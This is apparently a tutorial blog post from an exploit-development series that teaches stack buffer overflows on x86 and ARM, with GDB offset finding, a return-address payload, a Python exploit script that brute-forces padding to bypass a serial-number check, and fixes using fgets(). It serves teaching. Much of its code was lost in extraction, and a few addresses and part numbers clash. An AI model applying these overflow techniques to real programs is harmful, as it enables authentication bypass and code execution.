Introduction to exploit development - Part 2: Stack overflows
Overview
In Part 1, we configured lab environments for exploit development on both x86 and ARM. Next we'll turn to understanding the most basic vulnerability (which, surprisingly, is still the cause of many vulnerabilities to this day): the stack-based buffer overflow.
We'll look at understanding memory layout, stack frames, and how buffer overflows enable control flow hijacking. We will also examine two deliberately vulnerable programs to understand how exceeding buffer boundaries corrupts adjacent memory, ultimately allowing us to redirect program execution.
Memory layout of a process
When a program executes, the operating system allocates several distinct memory regions, each serving a specific purpose. Understanding this layout is critical for exploit development, as different vulnerabilities target different regions.
A typical Linux process memory layout (from low to high addresses):
- .text segment: Contains the executable machine instructions (program code). This region is typically read-only to prevent code modification at runtime.
- .data segment: Contains initialized global and static variables. These values are set at compile time and persist for the program's lifetime.
- .bss segment: Contains uninitialized global and static variables. The name stands for "Block Started by Symbol" (historical reasons). These are zero-initialized at program start.
- Heap: Dynamically allocated memory region that grows upward (toward higher addresses). Managed via
malloc(),calloc(),realloc(), andfree()in C. - Stack: Automatically managed memory for function call frames, local variables, and return addresses. Grows downward (toward lower addresses) on x86 and ARM architectures.
The stack and heap grow toward each other. If they collide, the program typically crashes with a stack overflow (not to be confused with stack buffer overflow, which we discuss below).
block-beta
columns 5
ADDR_G["0xbfffffff"]:1
G["Kernel space (top of user memory)"]:4
EMPTY1[" "]:1
F["Stack (grows downward ↓) - function calls"]:4
EMPTY2[" "]:1
E["(unused memory)"]:4
EMPTY3[" "]:1
D["Heap (grows upward ↑) - malloc/free"]:4
EMPTY4[" "]:1
C[".bss segment - uninitialized globals"]:4
ADDR_B["0x08049000"]:1
B[".data segment - initialized globals"]:4
ADDR_A["0x08048000"]:1
A[".text segment - executable code, read-only"]:4
style G fill:#fff,stroke:#8B7355,stroke-width:2px
style F fill:#fff,stroke:#6B8E23,stroke-width:2px
style E fill:#fff,stroke:#A9A9A9,stroke-width:2px
style D fill:#fff,stroke:#B8860B,stroke-width:2px
style C fill:#fff,stroke:#708090,stroke-width:2px
style B fill:#fff,stroke:#4682B4,stroke-width:2px
style A fill:#fff,stroke:#5F9EA0,stroke-width:2px
style ADDR_G fill:none,stroke:none
style ADDR_B fill:none,stroke:none
style ADDR_A fill:none,stroke:none
style EMPTY1 fill:none,stroke:none
style EMPTY2 fill:none,stroke:none
style EMPTY3 fill:none,stroke:none
style EMPTY4 fill:none,stroke:none
The diagram above illustrates this layout with typical x86 32-bit addresses. Note that modern systems with ASLR randomize most of these addresses on each execution, but we've disabled ASLR for learning purposes.
The call stack and stack frames
The stack is a Last-In-First-Out (LIFO) data structure used to manage function calls. Each function invocation creates a stack frame (also called an activation record) containing:
- Function arguments: Parameters passed to the function
- Return address: Memory address to return to after function completes
- Saved frame pointer: Previous stack frame's base pointer (allows stack unwinding)
- Local variables: Function's automatic variables
On x86, two registers manage the stack:
- ESP (Stack Pointer): Points to the top of the stack (lowest address in current frame)
- EBP (Base/Frame Pointer): Points to the base of the current stack frame (used as a reference point for accessing local variables and parameters)
On ARM, equivalent registers are:
- SP (Stack Pointer): Same purpose as ESP on x86
- FP (Frame Pointer): Same purpose as EBP on x86 (though modern ARM code often omits frame pointers for optimization)
- LR (Link Register): Stores the return address instead of pushing it to the stack initially
Function prologue and epilogue
When a function is called, the prologue sets up the stack frame:
; x86 function prologue
push ebp ; Save old frame pointer
mov ebp, esp ; Establish new frame pointer
sub esp, N ; Allocate space for local variables
When the function returns, the epilogue tears down the frame:
; x86 function epilogue
mov esp, ebp ; Restore stack pointer (or: leave instruction)
pop ebp ; Restore old frame pointer
ret ; Pop return address into EIP and jump
The ret instruction is critical for exploitation. It pops a value from the stack into the instruction pointer (EIP on x86, PC on ARM), transferring control to that address. If we can overwrite the saved return address on the stack, we can redirect execution anywhere in memory.
Buffer overflow mechanics
A buffer overflow occurs when data written to a buffer exceeds its allocated size, overwriting adjacent memory. In C, functions like gets(), strcpy(), and scanf() perform no bounds checking, making them dangerous when handling untrusted input.
Consider a simple vulnerable function:
void
The buffer array is allocated on the stack with space for 30 bytes. If user input exceeds 30 bytes, the excess data overwrites memory beyond the buffer. On the stack, this means overwriting:
- The saved frame pointer (EBP)
- The saved return address
- Potentially other local variables or function arguments from calling functions
By carefully crafting input, an attacker can overwrite the saved return address with a pointer to malicious code (shellcode), redirecting execution when the function returns.
Exploiting overflow.c
To understand buffer overflows concretely, we examine a vulnerable program and exploit it step by step.
overflow.c
void
int
Compile with security mitigations disabled (as configured in Part 1):
# x86
# ARM
Finding the overflow offset
We use GDB to determine exactly how many bytes are needed to overwrite the return address. First, disassemble the return_input function:
()
The disassembly reveals:
- The call to
gets()where user input is read - The
retinstruction where the function returns using the saved return address
Set breakpoints at the gets() call and at the ret instruction:
()()()
At the first breakpoint (before gets()), examine the stack:
()
The saved return address should be visible on the stack. By examining the disassembly of main, we can verify what address the function should return to normally (let's say 0x08048465).
Now continue to allow gets() to read input. Provide a pattern that allows us to identify the offset:
AAAAAAAAAA BBBBBBBBBB CCCCCCCCCC DDDDDDDDDD
After entering this input, continue to the second breakpoint (at ret). Examine the stack again:
()
()
If the input was long enough, you'll see the saved return address has been overwritten with our pattern (e.g., 0x44444444 if we used 'D' characters). By counting characters, we determine the exact offset.
In this case, 34 bytes of padding are needed before the 4-byte return address is overwritten.
Redirecting execution
To prove we control the instruction pointer, we can overwrite the return address with the address of return_input itself, causing the function to be called twice.
From the GDB disassembly, suppose return_input is located at 0x0804845f. We construct our payload:
payload = "A" * 34 + "\x5f\x84\x04\x08"
Note the address is in little-endian format (least significant byte first), as x86 is a little-endian architecture.
Automating exploitation with Python
Manual exploitation via GDB is not straightforward and tedious, so, let's instead automate the process with a simple Python script:
exploit.py
#!/usr/bin/env python3
"""
Executes the target program and pipes a payload into STDIN.
Args:
program_path: Path to the program to execute/exploit
padding_length: Number of padding bytes before shellcode
shellcode: The address or code to execute
Returns:
Decoded stdout from the target program
"""
= +
# Use stdbuf to disable C stdio buffering (prevents output loss on crash)
=
return
= # Address of return_input
= 34
Running this script redirects execution to return_input a second time, demonstrating control over the instruction pointer.
Architecture-specific offsets
The padding length of 34 bytes demonstrated above is specific to x86 architecture. ARM has different stack frame layouts and calling conventions due to its RISC design and use of the link register (LR). You'll need to determine the correct offset for your target architecture.
Finding the offset on ARM:
Use GDB with a unique pattern to identify where the return address is overwritten:
()
()
The PC (program counter) register will contain part of your pattern. For example, if pc = 0x4a4a4a4a (ASCII "JJJJ"), count the position of "JJJJ" in your pattern to determine the offset. In this case, "JJJJ" appears at byte 36, so 36 bytes of padding are needed on ARM.
Next, find the runtime address of return_input:
()
()
# Enter any input to hit the breakpoint
()
This shows the actual runtime address where the function is loaded in memory. The disassemble output shows relative offsets, not absolute addresses. On ARM, you might see something like {void (void)} 0x40052c <return_input>, indicating the function is at address 0x40052c at runtime.
ARM Thumb mode consideration:
ARM processors support two instruction set modes: ARM mode (32-bit instructions) and Thumb mode (16-bit instructions). Modern ARM code is typically compiled in Thumb mode for better code density. When jumping to a Thumb mode function, you must set the least significant bit (LSB) of the address to 1. This tells the processor to execute in Thumb mode. If you don't set the LSB, the processor will try to execute Thumb instructions as ARM instructions, resulting in an SIGILL (Illegal Instruction) error.
To check if your function uses Thumb mode, look at the GDB disassembly - if instructions are 2-byte aligned (e.g., 0x52c, 0x52e, 0x530), it's Thumb mode.
Use this address in your exploit with the LSB set:
# Set LSB to 1 for Thumb mode (0x10424 | 1 = 0x10425)
=
= 36 # ARM offset
Note architectural differences between x86 and ARM exploitation:
- Register names: ARM uses PC (program counter) instead of EIP, and LR (link register) for return addresses
- Stack layout: ARM's
push {r7, lr}prologue differs from x86'spush ebp; mov ebp, esp - Offsets: Due to different calling conventions, buffer overflow offsets vary between architectures
Exploiting serial.c
This second example presents a more fun/realistic scenario: bypassing authentication logic. The code is adapted from The Shellcoder's Handbook, 2nd Edition by Chris Anley et al.
serial.c
int
int
int
int
int
This program implements a serial number validation scheme. The valid_serial() function checks whether a provided string meets specific criteria:
- Length must be at least 10 characters
- All characters must be between '0' (ASCII 48) and 'z' (ASCII 122)
- The sum of all character ASCII values modulo 853 must equal 83
Finding a legitimate serial satisfying these constraints is technically possible but nontrivial. However, validate_serial() uses fscanf() with %s, which performs no bounds checking on the 24-byte serial buffer...so, buffer overflow time!
Bypassing validation
Instead of finding a valid serial number, we overflow the buffer to overwrite the return address of validate_serial(), redirecting execution directly to do_valid_stuff().
Using GDB, find the address of do_valid_stuff(). We then need to determine the correct padding length to reach the saved return address.
Since we don't know the exact offset, we can brute force it programmatically by making some modifications to the exploit.py program we created earlier:
= # Address of do_valid_stuff()
# shellcode = (0x1059c | 1).to_bytes(4, byteorder='little') # For ARM
=
break
This loop tries padding lengths from 24 to 34 bytes. When the correct offset is found (typically around 28 bytes for this program), the overflow redirects execution to do_valid_stuff(), bypassing the serial validation entirely.
Understanding the implications
These simple examples illustrate a fundamental security principle: memory safety violations enable arbitrary code execution. By corrupting the saved return address, we can redirect program flow to:
- Existing functions (as demonstrated above)
- Shellcode injected into memory (covered in Part 2)
- ROP gadgets for advanced exploitation (also covered in Part 2)
The vulnerability stems from:
- Unsafe functions that don't validate input bounds (
gets(),strcpy(),scanf(),fscanf()) - Languages (like C) that don't enforce memory safety by default
- The stack storing both data (local variables) and control flow information (return addresses) adjacently
Modern systems implement multiple mitigations against these attacks (ASLR, stack canaries, NX bit, DEP), but understanding the fundamental mechanics is very relevant to both offensive and defensive security work (and for a general understanding of how code execution works!).
Fixing the vulnerabilities
Fixing overflow.c
Replace gets() with the bounds-checked fgets():
void
The fgets() function requires the buffer size as a parameter, preventing overflows.
Fixing serial.c
Replace fscanf() with fgets(), but handle the trailing newline that fgets() includes:
int
The strcspn() function finds the newline character and replaces it with a null terminator, ensuring valid_serial() receives the expected format.
Next steps
We now understand how buffer overflows corrupt the stack and enable control flow hijacking. In Part 3, we explore how to leverage this control by injecting and executing arbitrary machine code (shellcode) on both x86 and ARM architectures.
We will learn to:
- Write position-independent shellcode in assembly
- Avoid null bytes that terminate string functions
- Use NOP sleds for reliable exploitation
- Apply Return-Oriented Programming (ROP) when the stack is non-executable
- Compare exploitation techniques across x86 and ARM architectures
References
- The Shellcoder's Handbook: Discovering and Exploiting Security Holes - Chris Anley, John Heasman, Felix Lindner, Gerardo Richarte
- Smashing The Stack For Fun And Profit - Aleph One (Phrack Magazine)
- Hacking: The Art of Exploitation - Jon Erickson
- Python subprocess documentation
- Removing trailing newline from fgets() input - Stack Overflow